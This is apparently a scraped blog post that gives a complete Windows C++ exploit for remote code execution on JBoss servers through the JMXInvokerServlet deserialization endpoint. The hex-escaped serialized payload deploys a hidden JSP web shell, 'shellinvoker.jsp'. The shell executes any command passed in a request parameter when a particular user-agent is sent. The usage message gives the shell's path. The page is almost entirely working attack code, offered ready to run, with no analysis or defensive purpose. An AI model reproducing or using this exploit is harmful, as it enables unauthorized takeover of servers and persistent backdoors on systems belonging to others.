zoukankan      html  css  js  c++  java
  • Jboss remote getshell (JMXInvokerServlet) vc版

    #include "stdafx.h"
    #include <Windows.h>
    #include <stdio.h>
    #include <winhttp.h>
    #include <comdef.h>
    #pragma comment (lib,"Winhttp.lib")
    
    char shell_invoke[] = ( 
        "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73" ///shellinvoker/shellinvoker.jsp
        "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72"
        "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f"
        "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77"
        "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76"
        "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2"
        "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75"
        "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e"
        "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00"
        "x78x70xe3x2cx60xe6x73x72x00x24x6fx72x67x2ex6ax62"
        "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d"
        "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc"
        "xe0xd1xf4x4axd0x99x0cx00x00x78x70x7ax00x00x02xc6"
        "x00x00x02xbexacxedx00x05x75x72x00x13x5bx4cx6ax61"
        "x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90"
        "xcex58x9fx10x73x29x6cx02x00x00x78x70x00x00x00x04"
        "x73x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65"
        "x6dx65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0f"
        "x03xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x2cx6a"
        "x62x6fx73x73x2ex61x64x6dx69x6ex3ax73x65x72x76x69"
        "x63x65x3dx44x65x70x6cx6fx79x6dx65x6ex74x46x69x6c"
        "x65x52x65x70x6fx73x69x74x6fx72x79x78x74x00x05x73"
        "x74x6fx72x65x75x71x00x7ex00x00x00x00x00x05x74x00"
        "x10x73x68x65x6cx6cx69x6ex76x6fx6bx65x72x2ex77x61"
        "x72x74x00x0cx73x68x65x6cx6cx69x6ex76x6fx6bx65x72"
        "x74x00x04x2ex6ax73x70x74x01x79x3cx25x40x20x70x61"
        "x67x65x20x69x6dx70x6fx72x74x3dx22x6ax61x76x61x2e"
        "x75x74x69x6cx2ex2ax2cx6ax61x76x61x2ex69x6fx2ex2a"
        "x22x25x3ex3cx70x72x65x3ex3cx25x69x66x28x72x65x71"
        "x75x65x73x74x2ex67x65x74x50x61x72x61x6dx65x74x65"
        "x72x28x22x70x70x70x22x29x20x21x3dx20x6ex75x6cx6c"
        "x20x26x26x20x72x65x71x75x65x73x74x2ex67x65x74x48"
        "x65x61x64x65x72x28x22x75x73x65x72x2dx61x67x65x6e"
        "x74x22x29x2ex65x71x75x61x6cx73x28x22x6ax65x78x62"
        "x6fx73x73x22x29x20x29x20x7bx20x50x72x6fx63x65x73"
        "x73x20x70x20x3dx20x52x75x6ex74x69x6dx65x2ex67x65"
        "x74x52x75x6ex74x69x6dx65x28x29x2ex65x78x65x63x28"
        "x72x65x71x75x65x73x74x2ex67x65x74x50x61x72x61x6d"
        "x65x74x65x72x28x22x70x70x70x22x29x29x3bx20x44x61"
        "x74x61x49x6ex70x75x74x53x74x72x65x61x6dx20x64x69"
        "x73x20x3dx20x6ex65x77x20x44x61x74x61x49x6ex70x75"
        "x74x53x74x72x65x61x6dx28x70x2ex67x65x74x49x6ex70"
        "x75x74x53x74x72x65x61x6dx28x29x29x3bx20x53x74x72"
        "x69x6ex67x20x64x69x73x72x20x3dx20x64x69x73x2ex72"
        "x65x61x64x4cx69x6ex65x28x29x3bx20x77x68x69x6cx65"
        "x20x28x20x64x69x73x72x20x21x3dx20x6ex75x6cx6cx20"
        "x29x20x7bx20x6fx75x74x2ex70x72x69x6ex74x6cx6ex28"
        "x64x69x73x72x29x3bx20x64x69x73x72x20x3dx20x64x69"
        "x73x2ex72x65x61x64x4cx69x6ex65x28x29x3bx20x7dx20"
        "x7dx25x3ex73x72x00x11x6ax61x76x61x2ex6cx61x6ex67"
        "x2ex42x6fx6fx6cx65x61x6excdx20x72x80xd5x9cxfaxee"
        "x02x00x01x5ax00x05x76x61x6cx75x65x78x70x01x75x72"
        "x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74"
        "x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00"
        "x78x70x00x00x00x05x74x00x10x6ax61x76x61x2ex6cx61"
        "x6ex67x2ex53x74x72x69x6ex67x71x00x7ex00x0fx71x00"
        "x7ex00x0fx71x00x7ex00x0fx74x00x07x62x6fx6fx6cx65"
        "x61x6ex63x79xb8x87x78x77x08x00x00x00x00x00x00x00"
        "x01x73x72x00x22x6fx72x67x2ex6ax62x6fx73x73x2ex69"
        "x6ex76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61"
        "x74x69x6fx6ex4bx65x79xb8xfbx72x84xd7x93x85xf9x02"
        "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00"
        "x00x04x70x78");
    
    void request_https(wchar_t* Host,int port)
    {
        DWORD dwSize = 0;
        DWORD dwDownloaded = 0;
        LPSTR pszOutBuffer;
        BOOL bResults = FALSE;
        HINTERNET hSession = NULL,
            hConnect = NULL,
            hRequest = NULL;
    
        // Use WinHttpOpen to obtain a session handle.
        hSession = WinHttpOpen( L"WinHTTP Example/1.0",
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            WINHTTP_NO_PROXY_NAME,
            WINHTTP_NO_PROXY_BYPASS, 0);
    
        // Specify an HTTP server.
        if (hSession)
            hConnect = WinHttpConnect( hSession,Host,
            port, 0);
    
        // Create an HTTP request handle.
        if (hConnect)
            hRequest = WinHttpOpenRequest( hConnect, L"POST",L"/invoker/JMXInvokerServlet",
            NULL, WINHTTP_NO_REFERER,
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            WINHTTP_FLAG_SECURE);
    
        DWORD options = SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
            SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
            SECURITY_FLAG_IGNORE_UNKNOWN_CA ;
    
        if( hRequest )
            bResults = WinHttpAddRequestHeaders( hRequest,
            L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
            ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
        bResults = WinHttpAddRequestHeaders( hRequest, 
            L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
        bResults = WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS ,
            (LPVOID)&options, sizeof (DWORD) );
    
        if(bResults == FALSE){
            printf("Error in WinHttpQueryOption WINHTTP_OPTION_SECURITY_FLAGS: %ld
    ",GetLastError());
        }
    
        // Send a request.
        if (hRequest){
            bResults = WinHttpSendRequest( hRequest,
                WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                shell_invoke, WORD(sizeof(shell_invoke)),
                sizeof(shell_invoke), 0);
            if(bResults == FALSE)
                printf ("WinHttpSendRequest error: %ld
    ",GetLastError());
        }
    
        if( hRequest ) WinHttpCloseHandle( hRequest );
        if( hConnect ) WinHttpCloseHandle( hConnect );
        if( hSession ) WinHttpCloseHandle( hSession );
    }
    
    
    void request_http(wchar_t* Host, int Port)
    {
        DWORD dwSize = sizeof(DWORD);
        DWORD dwStatusCode = 0;
        BOOL  bResults = FALSE;
        HINTERNET hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;
    
        // Use WinHttpOpen to obtain a session handle.
        hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36", 
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            WINHTTP_NO_PROXY_NAME, 
            WINHTTP_NO_PROXY_BYPASS,
            0 );
    
        // Specify an HTTP server.
        if( hSession )
            hConnect = WinHttpConnect( hSession,
            Host,
            Port,
            0 );
    
        // Create an HTTP Request handle.
        if( hConnect )
            hRequest = WinHttpOpenRequest( hConnect,
            L"POST",L"/invoker/JMXInvokerServlet",  // /invoker/JMXInvokerServlet
            NULL,
            WINHTTP_NO_REFERER, 
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            0 );
        // Add a request header.
        if( hRequest )
            bResults = WinHttpAddRequestHeaders( hRequest,
            L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
            ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
            bResults = WinHttpAddRequestHeaders( hRequest, 
                L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
        // Send a Request.
        if( bResults ) 
            bResults = WinHttpSendRequest( hRequest, 
            WINHTTP_NO_ADDITIONAL_HEADERS,
            0,
            shell_invoke,WORD(sizeof(shell_invoke)),
            sizeof(shell_invoke),
            0 );
    
        // Report any errors.
        if( !bResults )
            printf( "Error %d has occurred.
    ", GetLastError( ) );
    
        // Close open handles.
        if( hRequest ) WinHttpCloseHandle( hRequest );
        if( hConnect ) WinHttpCloseHandle( hConnect );
        if( hSession ) WinHttpCloseHandle( hSession );
        //return 0;
    }
    
    int main(int argc, char* argv[])
    {
    
        if (argc < 4)
        {
            printf("[*]:%s Jboss Exploit remote getshell
    ",argv[0]);
            printf("[*]:%s Remote_Host Remote_ip http/https 
    ",argv[0]);
            printf("[*]:Getshell Path:/shellinvoker/shellinvoker.jsp
    ");
            return -1;
        }
        wchar_t Host[MAX_PATH] = {0};
        wchar_t procotol[MAX_PATH] = {0};
        wsprintfW(Host, L"%S", argv[1]);
        wsprintfW(procotol,L"%S",argv[3]);
        printf("
    [*]:Host:%S procotol:%S 
    ", Host,procotol);
    
        if (0 == lstrcmpi(procotol, L"http"))
        {
            request_http(Host,atoi(argv[2]));
    
        }else if(0 == lstrcmpi(procotol, L"https"))
        {
            request_https(Host,atoi(argv[2]));
        }else
        {
            printf("
    Unknown option.
    ");
            return 0;
        }
        return 0;
    }

  • 相关阅读:
    MySQL回顾
    mysql多表查询
    通过JDBC进行简单的增删改查(以MySQL为例)
    如何正确学习JavaScript
    List集合遍历时修改元素出现并发修改异常总结
    国内有哪些质量高的JAVA社区?
    【题解】【链表】【Leetcode】Add Two Numbers
    【题解】【字符串】【Leetcode】Valid Palindrome
    【题解】【DP】【Leetcode】Climbing Stairs
    【题解】【数组】【Leetcode】Merge Sorted Array
  • 原文地址:https://www.cnblogs.com/killbit/p/4489664.html
Copyright © 2011-2022 走看看